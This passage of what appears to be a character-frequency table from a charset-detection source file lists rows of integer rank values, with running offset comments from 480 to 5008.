2129,1363,3689,1423, 697, 100,3094, 48, 70,1231, 495,3139,2196,5043,1294,5044, # 480
2080, 462, 586,1042,3279, 853, 256, 988, 185,2382,3457,1698, 434,1084,5045,3458, # 496
314,2625,2788,4522,2335,2336, 569,2285, 637,1817,2525, 757,1162,1879,1616,3459, # 512
287,1577,2116, 768,4523,1671,2868,3566,2526,1321,3816, 909,2418,5046,4211, 933, # 528
3817,4212,2053,2361,1222,4524, 765,2419,1322, 786,4525,5047,1920,1462,1677,2909, # 544
1699,5048,4526,1424,2442,3140,3690,2600,3353,1775,1941,3460,3983,4213, 309,1369, # 560
1130,2825, 364,2234,1653,1299,3984,3567,3985,3986,2656, 525,1085,3041, 902,2001, # 576
1475, 964,4527, 421,1845,1415,1057,2286, 940,1364,3141, 376,4528,4529,1381, 7, # 592
2527, 983,2383, 336,1710,2684,1846, 321,3461, 559,1131,3042,2752,1809,1132,1313, # 608
265,1481,1858,5049, 352,1203,2826,3280, 167,1089, 420,2827, 776, 792,1724,3568, # 624
4214,2443,3281,5050,4215,5051, 446, 229, 333,2753, 901,3818,1200,1557,4530,2657, # 640
1921, 395,2754,2685,3819,4216,1836, 125, 916,3209,2626,4531,5052,5053,3820,5054, # 656
5055,5056,4532,3142,3691,1133,2555,1757,3462,1510,2318,1409,3569,5057,2146, 438, # 672
2601,2910,2384,3354,1068, 958,3043, 461, 311,2869,2686,4217,1916,3210,4218,1979, # 688
383, 750,2755,2627,4219, 274, 539, 385,1278,1442,5058,1154,1965, 384, 561, 210, # 704
98,1295,2556,3570,5059,1711,2420,1482,3463,3987,2911,1257, 129,5060,3821, 642, # 720
523,2789,2790,2658,5061, 141,2235,1333, 68, 176, 441, 876, 907,4220, 603,2602, # 736
710, 171,3464, 404, 549, 18,3143,2398,1410,3692,1666,5062,3571,4533,2912,4534, # 752
5063,2991, 368,5064, 146, 366, 99, 871,3693,1543, 748, 807,1586,1185, 22,2263, # 768
379,3822,3211,5065,3212, 505,1942,2628,1992,1382,2319,5066, 380,2362, 218, 702, # 784
1818,1248,3465,3044,3572,3355,3282,5067,2992,3694, 930,3283,3823,5068, 59,5069, # 800
585, 601,4221, 497,3466,1112,1314,4535,1802,5070,1223,1472,2177,5071, 749,1837, # 816
690,1900,3824,1773,3988,1476, 429,1043,1791,2236,2117, 917,4222, 447,1086,1629, # 832
5072, 556,5073,5074,2021,1654, 844,1090, 105, 550, 966,1758,2828,1008,1783, 686, # 848
1095,5075,2287, 793,1602,5076,3573,2603,4536,4223,2948,2302,4537,3825, 980,2503, # 864
544, 353, 527,4538, 908,2687,2913,5077, 381,2629,1943,1348,5078,1341,1252, 560, # 880
3095,5079,3467,2870,5080,2054, 973, 886,2081, 143,4539,5081,5082, 157,3989, 496, # 896
4224, 57, 840, 540,2039,4540,4541,3468,2118,1445, 970,2264,1748,1966,2082,4225, # 912
3144,1234,1776,3284,2829,3695, 773,1206,2130,1066,2040,1326,3990,1738,1725,4226, # 928
279,3145, 51,1544,2604, 423,1578,2131,2067, 173,4542,1880,5083,5084,1583, 264, # 944
610,3696,4543,2444, 280, 154,5085,5086,5087,1739, 338,1282,3096, 693,2871,1411, # 960
1074,3826,2445,5088,4544,5089,5090,1240, 952,2399,5091,2914,1538,2688, 685,1483, # 976
4227,2475,1436, 953,4228,2055,4545, 671,2400, 79,4229,2446,3285, 608, 567,2689, # 992
3469,4230,4231,1691, 393,1261,1792,2401,5092,4546,5093,5094,5095,5096,1383,1672, # 1008
3827,3213,1464, 522,1119, 661,1150, 216, 675,4547,3991,1432,3574, 609,4548,2690, # 1024
2402,5097,5098,5099,4232,3045, 0,5100,2476, 315, 231,2447, 301,3356,4549,2385, # 1040
5101, 233,4233,3697,1819,4550,4551,5102, 96,1777,1315,2083,5103, 257,5104,1810, # 1056
3698,2718,1139,1820,4234,2022,1124,2164,2791,1778,2659,5105,3097, 363,1655,3214, # 1072
5106,2993,5107,5108,5109,3992,1567,3993, 718, 103,3215, 849,1443, 341,3357,2949, # 1088
1484,5110,1712, 127, 67, 339,4235,2403, 679,1412, 821,5111,5112, 834, 738, 351, # 1104
2994,2147, 846, 235,1497,1881, 418,1993,3828,2719, 186,1100,2148,2756,3575,1545, # 1120
1355,2950,2872,1377, 583,3994,4236,2581,2995,5113,1298,3699,1078,2557,3700,2363, # 1136
78,3829,3830, 267,1289,2100,2002,1594,4237, 348, 369,1274,2197,2178,1838,4552, # 1152
1821,2830,3701,2757,2288,2003,4553,2951,2758, 144,3358, 882,4554,3995,2759,3470, # 1168
4555,2915,5114,4238,1726, 320,5115,3996,3046, 788,2996,5116,2831,1774,1327,2873, # 1184
3997,2832,5117,1306,4556,2004,1700,3831,3576,2364,2660, 787,2023, 506, 824,3702, # 1200
534, 323,4557,1044,3359,2024,1901, 946,3471,5118,1779,1500,1678,5119,1882,4558, # 1216
165, 243,4559,3703,2528, 123, 683,4239, 764,4560, 36,3998,1793, 589,2916, 816, # 1232
626,1667,3047,2237,1639,1555,1622,3832,3999,5120,4000,2874,1370,1228,1933, 891, # 1248
2084,2917, 304,4240,5121, 292,2997,2720,3577, 691,2101,4241,1115,4561, 118, 662, # 1264
5122, 611,1156, 854,2386,1316,2875, 2, 386, 515,2918,5123,5124,3286, 868,2238, # 1280
1486, 855,2661, 785,2216,3048,5125,1040,3216,3578,5126,3146, 448,5127,1525,5128, # 1296
2165,4562,5129,3833,5130,4242,2833,3579,3147, 503, 818,4001,3148,1568, 814, 676, # 1312
1444, 306,1749,5131,3834,1416,1030, 197,1428, 805,2834,1501,4563,5132,5133,5134, # 1328
1994,5135,4564,5136,5137,2198, 13,2792,3704,2998,3149,1229,1917,5138,3835,2132, # 1344
5139,4243,4565,2404,3580,5140,2217,1511,1727,1120,5141,5142, 646,3836,2448, 307, # 1360
5143,5144,1595,3217,5145,5146,5147,3705,1113,1356,4002,1465,2529,2530,5148, 519, # 1376
5149, 128,2133, 92,2289,1980,5150,4003,1512, 342,3150,2199,5151,2793,2218,1981, # 1392
3360,4244, 290,1656,1317, 789, 827,2365,5152,3837,4566, 562, 581,4004,5153, 401, # 1408
4567,2252, 94,4568,5154,1399,2794,5155,1463,2025,4569,3218,1944,5156, 828,1105, # 1424
4245,1262,1394,5157,4246, 605,4570,5158,1784,2876,5159,2835, 819,2102, 578,2200, # 1440
2952,5160,1502, 436,3287,4247,3288,2836,4005,2919,3472,3473,5161,2721,2320,5162, # 1456
5163,2337,2068, 23,4571, 193, 826,3838,2103, 699,1630,4248,3098, 390,1794,1064, # 1472
3581,5164,1579,3099,3100,1400,5165,4249,1839,1640,2877,5166,4572,4573, 137,4250, # 1488
598,3101,1967, 780, 104, 974,2953,5167, 278, 899, 253, 402, 572, 504, 493,1339, # 1504
5168,4006,1275,4574,2582,2558,5169,3706,3049,3102,2253, 565,1334,2722, 863, 41, # 1520
5170,5171,4575,5172,1657,2338, 19, 463,2760,4251, 606,5173,2999,3289,1087,2085, # 1536
1323,2662,3000,5174,1631,1623,1750,4252,2691,5175,2878, 791,2723,2663,2339, 232, # 1552
2421,5176,3001,1498,5177,2664,2630, 755,1366,3707,3290,3151,2026,1609, 119,1918, # 1568
3474, 862,1026,4253,5178,4007,3839,4576,4008,4577,2265,1952,2477,5179,1125, 817, # 1584
4254,4255,4009,1513,1766,2041,1487,4256,3050,3291,2837,3840,3152,5180,5181,1507, # 1600
5182,2692, 733, 40,1632,1106,2879, 345,4257, 841,2531, 230,4578,3002,1847,3292, # 1616
3475,5183,1263, 986,3476,5184, 735, 879, 254,1137, 857, 622,1300,1180,1388,1562, # 1632
4010,4011,2954, 967,2761,2665,1349, 592,2134,1692,3361,3003,1995,4258,1679,4012, # 1648
1902,2188,5185, 739,3708,2724,1296,1290,5186,4259,2201,2202,1922,1563,2605,2559, # 1664
1871,2762,3004,5187, 435,5188, 343,1108, 596, 17,1751,4579,2239,3477,3709,5189, # 1680
4580, 294,3582,2955,1693, 477, 979, 281,2042,3583, 643,2043,3710,2631,2795,2266, # 1696
1031,2340,2135,2303,3584,4581, 367,1249,2560,5190,3585,5191,4582,1283,3362,2005, # 1712
240,1762,3363,4583,4584, 836,1069,3153, 474,5192,2149,2532, 268,3586,5193,3219, # 1728
1521,1284,5194,1658,1546,4260,5195,3587,3588,5196,4261,3364,2693,1685,4262, 961, # 1744
1673,2632, 190,2006,2203,3841,4585,4586,5197, 570,2504,3711,1490,5198,4587,2633, # 1760
3293,1957,4588, 584,1514, 396,1045,1945,5199,4589,1968,2449,5200,5201,4590,4013, # 1776
619,5202,3154,3294, 215,2007,2796,2561,3220,4591,3221,4592, 763,4263,3842,4593, # 1792
5203,5204,1958,1767,2956,3365,3712,1174, 452,1477,4594,3366,3155,5205,2838,1253, # 1808
2387,2189,1091,2290,4264, 492,5206, 638,1169,1825,2136,1752,4014, 648, 926,1021, # 1824
1324,4595, 520,4596, 997, 847,1007, 892,4597,3843,2267,1872,3713,2405,1785,4598, # 1840
1953,2957,3103,3222,1728,4265,2044,3714,4599,2008,1701,3156,1551, 30,2268,4266, # 1856
5207,2027,4600,3589,5208, 501,5209,4267, 594,3478,2166,1822,3590,3479,3591,3223, # 1872
829,2839,4268,5210,1680,3157,1225,4269,5211,3295,4601,4270,3158,2341,5212,4602, # 1888
4271,5213,4015,4016,5214,1848,2388,2606,3367,5215,4603, 374,4017, 652,4272,4273, # 1904
375,1140, 798,5216,5217,5218,2366,4604,2269, 546,1659, 138,3051,2450,4605,5219, # 1920
2254, 612,1849, 910, 796,3844,1740,1371, 825,3845,3846,5220,2920,2562,5221, 692, # 1936
444,3052,2634, 801,4606,4274,5222,1491, 244,1053,3053,4275,4276, 340,5223,4018, # 1952
1041,3005, 293,1168, 87,1357,5224,1539, 959,5225,2240, 721, 694,4277,3847, 219, # 1968
1478, 644,1417,3368,2666,1413,1401,1335,1389,4019,5226,5227,3006,2367,3159,1826, # 1984
730,1515, 184,2840, 66,4607,5228,1660,2958, 246,3369, 378,1457, 226,3480, 975, # 2000
4020,2959,1264,3592, 674, 696,5229, 163,5230,1141,2422,2167, 713,3593,3370,4608, # 2016
4021,5231,5232,1186, 15,5233,1079,1070,5234,1522,3224,3594, 276,1050,2725, 758, # 2032
1126, 653,2960,3296,5235,2342, 889,3595,4022,3104,3007, 903,1250,4609,4023,3481, # 2048
3596,1342,1681,1718, 766,3297, 286, 89,2961,3715,5236,1713,5237,2607,3371,3008, # 2064
5238,2962,2219,3225,2880,5239,4610,2505,2533, 181, 387,1075,4024, 731,2190,3372, # 2080
5240,3298, 310, 313,3482,2304, 770,4278, 54,3054, 189,4611,3105,3848,4025,5241, # 2096
1230,1617,1850, 355,3597,4279,4612,3373, 111,4280,3716,1350,3160,3483,3055,4281, # 2112
2150,3299,3598,5242,2797,4026,4027,3009, 722,2009,5243,1071, 247,1207,2343,2478, # 2128
1378,4613,2010, 864,1437,1214,4614, 373,3849,1142,2220, 667,4615, 442,2763,2563, # 2144
3850,4028,1969,4282,3300,1840, 837, 170,1107, 934,1336,1883,5244,5245,2119,4283, # 2160
2841, 743,1569,5246,4616,4284, 582,2389,1418,3484,5247,1803,5248, 357,1395,1729, # 2176
3717,3301,2423,1564,2241,5249,3106,3851,1633,4617,1114,2086,4285,1532,5250, 482, # 2192
2451,4618,5251,5252,1492, 833,1466,5253,2726,3599,1641,2842,5254,1526,1272,3718, # 2208
4286,1686,1795, 416,2564,1903,1954,1804,5255,3852,2798,3853,1159,2321,5256,2881, # 2224
4619,1610,1584,3056,2424,2764, 443,3302,1163,3161,5257,5258,4029,5259,4287,2506, # 2240
3057,4620,4030,3162,2104,1647,3600,2011,1873,4288,5260,4289, 431,3485,5261, 250, # 2256
97, 81,4290,5262,1648,1851,1558, 160, 848,5263, 866, 740,1694,5264,2204,2843, # 2272
3226,4291,4621,3719,1687, 950,2479, 426, 469,3227,3720,3721,4031,5265,5266,1188, # 2288
424,1996, 861,3601,4292,3854,2205,2694, 168,1235,3602,4293,5267,2087,1674,4622, # 2304
3374,3303, 220,2565,1009,5268,3855, 670,3010, 332,1208, 717,5269,5270,3603,2452, # 2320
4032,3375,5271, 513,5272,1209,2882,3376,3163,4623,1080,5273,5274,5275,5276,2534, # 2336
3722,3604, 815,1587,4033,4034,5277,3605,3486,3856,1254,4624,1328,3058,1390,4035, # 2352
1741,4036,3857,4037,5278, 236,3858,2453,3304,5279,5280,3723,3859,1273,3860,4625, # 2368
5281, 308,5282,4626, 245,4627,1852,2480,1307,2583, 430, 715,2137,2454,5283, 270, # 2384
199,2883,4038,5284,3606,2727,1753, 761,1754, 725,1661,1841,4628,3487,3724,5285, # 2400
5286, 587, 14,3305, 227,2608, 326, 480,2270, 943,2765,3607, 291, 650,1884,5287, # 2416
1702,1226, 102,1547, 62,3488, 904,4629,3489,1164,4294,5288,5289,1224,1548,2766, # 2432
391, 498,1493,5290,1386,1419,5291,2056,1177,4630, 813, 880,1081,2368, 566,1145, # 2448
4631,2291,1001,1035,2566,2609,2242, 394,1286,5292,5293,2069,5294, 86,1494,1730, # 2464
4039, 491,1588, 745, 897,2963, 843,3377,4040,2767,2884,3306,1768, 998,2221,2070, # 2480
397,1827,1195,1970,3725,3011,3378, 284,5295,3861,2507,2138,2120,1904,5296,4041, # 2496
2151,4042,4295,1036,3490,1905, 114,2567,4296, 209,1527,5297,5298,2964,2844,2635, # 2512
2390,2728,3164, 812,2568,5299,3307,5300,1559, 737,1885,3726,1210, 885, 28,2695, # 2528
3608,3862,5301,4297,1004,1780,4632,5302, 346,1982,2222,2696,4633,3863,1742, 797, # 2544
1642,4043,1934,1072,1384,2152, 896,4044,3308,3727,3228,2885,3609,5303,2569,1959, # 2560
4634,2455,1786,5304,5305,5306,4045,4298,1005,1308,3728,4299,2729,4635,4636,1528, # 2576
2610, 161,1178,4300,1983, 987,4637,1101,4301, 631,4046,1157,3229,2425,1343,1241, # 2592
1016,2243,2570, 372, 877,2344,2508,1160, 555,1935, 911,4047,5307, 466,1170, 169, # 2608
1051,2921,2697,3729,2481,3012,1182,2012,2571,1251,2636,5308, 992,2345,3491,1540, # 2624
2730,1201,2071,2406,1997,2482,5309,4638, 528,1923,2191,1503,1874,1570,2369,3379, # 2640
3309,5310, 557,1073,5311,1828,3492,2088,2271,3165,3059,3107, 767,3108,2799,4639, # 2656
1006,4302,4640,2346,1267,2179,3730,3230, 778,4048,3231,2731,1597,2667,5312,4641, # 2672
5313,3493,5314,5315,5316,3310,2698,1433,3311, 131, 95,1504,4049, 723,4303,3166, # 2688
1842,3610,2768,2192,4050,2028,2105,3731,5317,3013,4051,1218,5318,3380,3232,4052, # 2704
4304,2584, 248,1634,3864, 912,5319,2845,3732,3060,3865, 654, 53,5320,3014,5321, # 2720
1688,4642, 777,3494,1032,4053,1425,5322, 191, 820,2121,2846, 971,4643, 931,3233, # 2736
135, 664, 783,3866,1998, 772,2922,1936,4054,3867,4644,2923,3234, 282,2732, 640, # 2752
1372,3495,1127, 922, 325,3381,5323,5324, 711,2045,5325,5326,4055,2223,2800,1937, # 2768
4056,3382,2224,2255,3868,2305,5327,4645,3869,1258,3312,4057,3235,2139,2965,4058, # 2784
4059,5328,2225, 258,3236,4646, 101,1227,5329,3313,1755,5330,1391,3314,5331,2924, # 2800
2057, 893,5332,5333,5334,1402,4305,2347,5335,5336,3237,3611,5337,5338, 878,1325, # 2816
1781,2801,4647, 259,1385,2585, 744,1183,2272,4648,5339,4060,2509,5340, 684,1024, # 2832
4306,5341, 472,3612,3496,1165,3315,4061,4062, 322,2153, 881, 455,1695,1152,1340, # 2848
660, 554,2154,4649,1058,4650,4307, 830,1065,3383,4063,4651,1924,5342,1703,1919, # 2864
5343, 932,2273, 122,5344,4652, 947, 677,5345,3870,2637, 297,1906,1925,2274,4653, # 2880
2322,3316,5346,5347,4308,5348,4309, 84,4310, 112, 989,5349, 547,1059,4064, 701, # 2896
3613,1019,5350,4311,5351,3497, 942, 639, 457,2306,2456, 993,2966, 407, 851, 494, # 2912
4654,3384, 927,5352,1237,5353,2426,3385, 573,4312, 680, 921,2925,1279,1875, 285, # 2928
790,1448,1984, 719,2168,5354,5355,4655,4065,4066,1649,5356,1541, 563,5357,1077, # 2944
5358,3386,3061,3498, 511,3015,4067,4068,3733,4069,1268,2572,3387,3238,4656,4657, # 2960
5359, 535,1048,1276,1189,2926,2029,3167,1438,1373,2847,2967,1134,2013,5360,4313, # 2976
1238,2586,3109,1259,5361, 700,5362,2968,3168,3734,4314,5363,4315,1146,1876,1907, # 2992
4658,2611,4070, 781,2427, 132,1589, 203, 147, 273,2802,2407, 898,1787,2155,4071, # 3008
4072,5364,3871,2803,5365,5366,4659,4660,5367,3239,5368,1635,3872, 965,5369,1805, # 3024
2699,1516,3614,1121,1082,1329,3317,4073,1449,3873, 65,1128,2848,2927,2769,1590, # 3040
3874,5370,5371, 12,2668, 45, 976,2587,3169,4661, 517,2535,1013,1037,3240,5372, # 3056
3875,2849,5373,3876,5374,3499,5375,2612, 614,1999,2323,3877,3110,2733,2638,5376, # 3072
2588,4316, 599,1269,5377,1811,3735,5378,2700,3111, 759,1060, 489,1806,3388,3318, # 3088
1358,5379,5380,2391,1387,1215,2639,2256, 490,5381,5382,4317,1759,2392,2348,5383, # 3104
4662,3878,1908,4074,2640,1807,3241,4663,3500,3319,2770,2349, 874,5384,5385,3501, # 3120
3736,1859, 91,2928,3737,3062,3879,4664,5386,3170,4075,2669,5387,3502,1202,1403, # 3136
3880,2969,2536,1517,2510,4665,3503,2511,5388,4666,5389,2701,1886,1495,1731,4076, # 3152
2370,4667,5390,2030,5391,5392,4077,2702,1216, 237,2589,4318,2324,4078,3881,4668, # 3168
4669,2703,3615,3504, 445,4670,5393,5394,5395,5396,2771, 61,4079,3738,1823,4080, # 3184
5397, 687,2046, 935, 925, 405,2670, 703,1096,1860,2734,4671,4081,1877,1367,2704, # 3200
3389, 918,2106,1782,2483, 334,3320,1611,1093,4672, 564,3171,3505,3739,3390, 945, # 3216
2641,2058,4673,5398,1926, 872,4319,5399,3506,2705,3112, 349,4320,3740,4082,4674, # 3232
3882,4321,3741,2156,4083,4675,4676,4322,4677,2408,2047, 782,4084, 400, 251,4323, # 3248
1624,5400,5401, 277,3742, 299,1265, 476,1191,3883,2122,4324,4325,1109, 205,5402, # 3264
2590,1000,2157,3616,1861,5403,5404,5405,4678,5406,4679,2573, 107,2484,2158,4085, # 3280
3507,3172,5407,1533, 541,1301, 158, 753,4326,2886,3617,5408,1696, 370,1088,4327, # 3296
4680,3618, 579, 327, 440, 162,2244, 269,1938,1374,3508, 968,3063, 56,1396,3113, # 3312
2107,3321,3391,5409,1927,2159,4681,3016,5410,3619,5411,5412,3743,4682,2485,5413, # 3328
2804,5414,1650,4683,5415,2613,5416,5417,4086,2671,3392,1149,3393,4087,3884,4088, # 3344
5418,1076, 49,5419, 951,3242,3322,3323, 450,2850, 920,5420,1812,2805,2371,4328, # 3360
1909,1138,2372,3885,3509,5421,3243,4684,1910,1147,1518,2428,4685,3886,5422,4686, # 3376
2393,2614, 260,1796,3244,5423,5424,3887,3324, 708,5425,3620,1704,5426,3621,1351, # 3392
1618,3394,3017,1887, 944,4329,3395,4330,3064,3396,4331,5427,3744, 422, 413,1714, # 3408
3325, 500,2059,2350,4332,2486,5428,1344,1911, 954,5429,1668,5430,5431,4089,2409, # 3424
4333,3622,3888,4334,5432,2307,1318,2512,3114, 133,3115,2887,4687, 629, 31,2851, # 3440
2706,3889,4688, 850, 949,4689,4090,2970,1732,2089,4335,1496,1853,5433,4091, 620, # 3456
3245, 981,1242,3745,3397,1619,3746,1643,3326,2140,2457,1971,1719,3510,2169,5434, # 3472
3246,5435,5436,3398,1829,5437,1277,4690,1565,2048,5438,1636,3623,3116,5439, 869, # 3488
2852, 655,3890,3891,3117,4092,3018,3892,1310,3624,4691,5440,5441,5442,1733, 558, # 3504
4692,3747, 335,1549,3065,1756,4336,3748,1946,3511,1830,1291,1192, 470,2735,2108, # 3520
2806, 913,1054,4093,5443,1027,5444,3066,4094,4693, 982,2672,3399,3173,3512,3247, # 3536
3248,1947,2807,5445, 571,4694,5446,1831,5447,3625,2591,1523,2429,5448,2090, 984, # 3552
4695,3749,1960,5449,3750, 852, 923,2808,3513,3751, 969,1519, 999,2049,2325,1705, # 3568
5450,3118, 615,1662, 151, 597,4095,2410,2326,1049, 275,4696,3752,4337, 568,3753, # 3584
3626,2487,4338,3754,5451,2430,2275, 409,3249,5452,1566,2888,3514,1002, 769,2853, # 3600
194,2091,3174,3755,2226,3327,4339, 628,1505,5453,5454,1763,2180,3019,4096, 521, # 3616
1161,2592,1788,2206,2411,4697,4097,1625,4340,4341, 412, 42,3119, 464,5455,2642, # 3632
4698,3400,1760,1571,2889,3515,2537,1219,2207,3893,2643,2141,2373,4699,4700,3328, # 3648
1651,3401,3627,5456,5457,3628,2488,3516,5458,3756,5459,5460,2276,2092, 460,5461, # 3664
4701,5462,3020, 962, 588,3629, 289,3250,2644,1116, 52,5463,3067,1797,5464,5465, # 3680
5466,1467,5467,1598,1143,3757,4342,1985,1734,1067,4702,1280,3402, 465,4703,1572, # 3696
510,5468,1928,2245,1813,1644,3630,5469,4704,3758,5470,5471,2673,1573,1534,5472, # 3712
5473, 536,1808,1761,3517,3894,3175,2645,5474,5475,5476,4705,3518,2929,1912,2809, # 3728
5477,3329,1122, 377,3251,5478, 360,5479,5480,4343,1529, 551,5481,2060,3759,1769, # 3744
2431,5482,2930,4344,3330,3120,2327,2109,2031,4706,1404, 136,1468,1479, 672,1171, # 3760
3252,2308, 271,3176,5483,2772,5484,2050, 678,2736, 865,1948,4707,5485,2014,4098, # 3776
2971,5486,2737,2227,1397,3068,3760,4708,4709,1735,2931,3403,3631,5487,3895, 509, # 3792
2854,2458,2890,3896,5488,5489,3177,3178,4710,4345,2538,4711,2309,1166,1010, 552, # 3808
681,1888,5490,5491,2972,2973,4099,1287,1596,1862,3179, 358, 453, 736, 175, 478, # 3824
1117, 905,1167,1097,5492,1854,1530,5493,1706,5494,2181,3519,2292,3761,3520,3632, # 3840
4346,2093,4347,5495,3404,1193,2489,4348,1458,2193,2208,1863,1889,1421,3331,2932, # 3856
3069,2182,3521, 595,2123,5496,4100,5497,5498,4349,1707,2646, 223,3762,1359, 751, # 3872
3121, 183,3522,5499,2810,3021, 419,2374, 633, 704,3897,2394, 241,5500,5501,5502, # 3888
838,3022,3763,2277,2773,2459,3898,1939,2051,4101,1309,3122,2246,1181,5503,1136, # 3904
2209,3899,2375,1446,4350,2310,4712,5504,5505,4351,1055,2615, 484,3764,5506,4102, # 3920
625,4352,2278,3405,1499,4353,4103,5507,4104,4354,3253,2279,2280,3523,5508,5509, # 3936
2774, 808,2616,3765,3406,4105,4355,3123,2539, 526,3407,3900,4356, 955,5510,1620, # 3952
4357,2647,2432,5511,1429,3766,1669,1832, 994, 928,5512,3633,1260,5513,5514,5515, # 3968
1949,2293, 741,2933,1626,4358,2738,2460, 867,1184, 362,3408,1392,5516,5517,4106, # 3984
4359,1770,1736,3254,2934,4713,4714,1929,2707,1459,1158,5518,3070,3409,2891,1292, # 4000
1930,2513,2855,3767,1986,1187,2072,2015,2617,4360,5519,2574,2514,2170,3768,2490, # 4016
3332,5520,3769,4715,5521,5522, 666,1003,3023,1022,3634,4361,5523,4716,1814,2257, # 4032
574,3901,1603, 295,1535, 705,3902,4362, 283, 858, 417,5524,5525,3255,4717,4718, # 4048
3071,1220,1890,1046,2281,2461,4107,1393,1599, 689,2575, 388,4363,5526,2491, 802, # 4064
5527,2811,3903,2061,1405,2258,5528,4719,3904,2110,1052,1345,3256,1585,5529, 809, # 4080
5530,5531,5532, 575,2739,3524, 956,1552,1469,1144,2328,5533,2329,1560,2462,3635, # 4096
3257,4108, 616,2210,4364,3180,2183,2294,5534,1833,5535,3525,4720,5536,1319,3770, # 4112
3771,1211,3636,1023,3258,1293,2812,5537,5538,5539,3905, 607,2311,3906, 762,2892, # 4128
1439,4365,1360,4721,1485,3072,5540,4722,1038,4366,1450,2062,2648,4367,1379,4723, # 4144
2593,5541,5542,4368,1352,1414,2330,2935,1172,5543,5544,3907,3908,4724,1798,1451, # 4160
5545,5546,5547,5548,2936,4109,4110,2492,2351, 411,4111,4112,3637,3333,3124,4725, # 4176
1561,2674,1452,4113,1375,5549,5550, 47,2974, 316,5551,1406,1591,2937,3181,5552, # 4192
1025,2142,3125,3182, 354,2740, 884,2228,4369,2412, 508,3772, 726,3638, 996,2433, # 4208
3639, 729,5553, 392,2194,1453,4114,4726,3773,5554,5555,2463,3640,2618,1675,2813, # 4224
919,2352,2975,2353,1270,4727,4115, 73,5556,5557, 647,5558,3259,2856,2259,1550, # 4240
1346,3024,5559,1332, 883,3526,5560,5561,5562,5563,3334,2775,5564,1212, 831,1347, # 4256
4370,4728,2331,3909,1864,3073, 720,3910,4729,4730,3911,5565,4371,5566,5567,4731, # 4272
5568,5569,1799,4732,3774,2619,4733,3641,1645,2376,4734,5570,2938, 669,2211,2675, # 4288
2434,5571,2893,5572,5573,1028,3260,5574,4372,2413,5575,2260,1353,5576,5577,4735, # 4304
3183, 518,5578,4116,5579,4373,1961,5580,2143,4374,5581,5582,3025,2354,2355,3912, # 4320
516,1834,1454,4117,2708,4375,4736,2229,2620,1972,1129,3642,5583,2776,5584,2976, # 4336
1422, 577,1470,3026,1524,3410,5585,5586, 432,4376,3074,3527,5587,2594,1455,2515, # 4352
2230,1973,1175,5588,1020,2741,4118,3528,4737,5589,2742,5590,1743,1361,3075,3529, # 4368
2649,4119,4377,4738,2295, 895, 924,4378,2171, 331,2247,3076, 166,1627,3077,1098, # 4384
5591,1232,2894,2231,3411,4739, 657, 403,1196,2377, 542,3775,3412,1600,4379,3530, # 4400
5592,4740,2777,3261, 576, 530,1362,4741,4742,2540,2676,3776,4120,5593, 842,3913, # 4416
5594,2814,2032,1014,4121, 213,2709,3413, 665, 621,4380,5595,3777,2939,2435,5596, # 4432
2436,3335,3643,3414,4743,4381,2541,4382,4744,3644,1682,4383,3531,1380,5597, 724, # 4448
2282, 600,1670,5598,1337,1233,4745,3126,2248,5599,1621,4746,5600, 651,4384,5601, # 4464
1612,4385,2621,5602,2857,5603,2743,2312,3078,5604, 716,2464,3079, 174,1255,2710, # 4480
4122,3645, 548,1320,1398, 728,4123,1574,5605,1891,1197,3080,4124,5606,3081,3082, # 4496
3778,3646,3779, 747,5607, 635,4386,4747,5608,5609,5610,4387,5611,5612,4748,5613, # 4512
3415,4749,2437, 451,5614,3780,2542,2073,4388,2744,4389,4125,5615,1764,4750,5616, # 4528
4390, 350,4751,2283,2395,2493,5617,4391,4126,2249,1434,4127, 488,4752, 458,4392, # 4544
4128,3781, 771,1330,2396,3914,2576,3184,2160,2414,1553,2677,3185,4393,5618,2494, # 4560
2895,2622,1720,2711,4394,3416,4753,5619,2543,4395,5620,3262,4396,2778,5621,2016, # 4576
2745,5622,1155,1017,3782,3915,5623,3336,2313, 201,1865,4397,1430,5624,4129,5625, # 4592
5626,5627,5628,5629,4398,1604,5630, 414,1866, 371,2595,4754,4755,3532,2017,3127, # 4608
4756,1708, 960,4399, 887, 389,2172,1536,1663,1721,5631,2232,4130,2356,2940,1580, # 4624
5632,5633,1744,4757,2544,4758,4759,5634,4760,5635,2074,5636,4761,3647,3417,2896, # 4640
4400,5637,4401,2650,3418,2815, 673,2712,2465, 709,3533,4131,3648,4402,5638,1148, # 4656
502, 634,5639,5640,1204,4762,3649,1575,4763,2623,3783,5641,3784,3128, 948,3263, # 4672
121,1745,3916,1110,5642,4403,3083,2516,3027,4132,3785,1151,1771,3917,1488,4133, # 4688
1987,5643,2438,3534,5644,5645,2094,5646,4404,3918,1213,1407,2816, 531,2746,2545, # 4704
3264,1011,1537,4764,2779,4405,3129,1061,5647,3786,3787,1867,2897,5648,2018, 120, # 4720
4406,4407,2063,3650,3265,2314,3919,2678,3419,1955,4765,4134,5649,3535,1047,2713, # 4736
1266,5650,1368,4766,2858, 649,3420,3920,2546,2747,1102,2859,2679,5651,5652,2000, # 4752
5653,1111,3651,2977,5654,2495,3921,3652,2817,1855,3421,3788,5655,5656,3422,2415, # 4768
2898,3337,3266,3653,5657,2577,5658,3654,2818,4135,1460, 856,5659,3655,5660,2899, # 4784
2978,5661,2900,3922,5662,4408, 632,2517, 875,3923,1697,3924,2296,5663,5664,4767, # 4800
3028,1239, 580,4768,4409,5665, 914, 936,2075,1190,4136,1039,2124,5666,5667,5668, # 4816
5669,3423,1473,5670,1354,4410,3925,4769,2173,3084,4137, 915,3338,4411,4412,3339, # 4832
1605,1835,5671,2748, 398,3656,4413,3926,4138, 328,1913,2860,4139,3927,1331,4414, # 4848
3029, 937,4415,5672,3657,4140,4141,3424,2161,4770,3425, 524, 742, 538,3085,1012, # 4864
5673,5674,3928,2466,5675, 658,1103, 225,3929,5676,5677,4771,5678,4772,5679,3267, # 4880
1243,5680,4142, 963,2250,4773,5681,2714,3658,3186,5682,5683,2596,2332,5684,4774, # 4896
5685,5686,5687,3536, 957,3426,2547,2033,1931,2941,2467, 870,2019,3659,1746,2780, # 4912
2781,2439,2468,5688,3930,5689,3789,3130,3790,3537,3427,3791,5690,1179,3086,5691, # 4928
3187,2378,4416,3792,2548,3188,3131,2749,4143,5692,3428,1556,2549,2297, 977,2901, # 4944
2034,4144,1205,3429,5693,1765,3430,3189,2125,1271, 714,1689,4775,3538,5694,2333, # 4960
3931, 533,4417,3660,2184, 617,5695,2469,3340,3539,2315,5696,5697,3190,5698,5699, # 4976
3932,1988, 618, 427,2651,3540,3431,5700,5701,1244,1690,5702,2819,4418,4776,5703, # 4992
3541,4777,5704,2284,1576, 473,3661,4419,3432, 972,5705,3662,5706,3087,5707,5708, # 5008
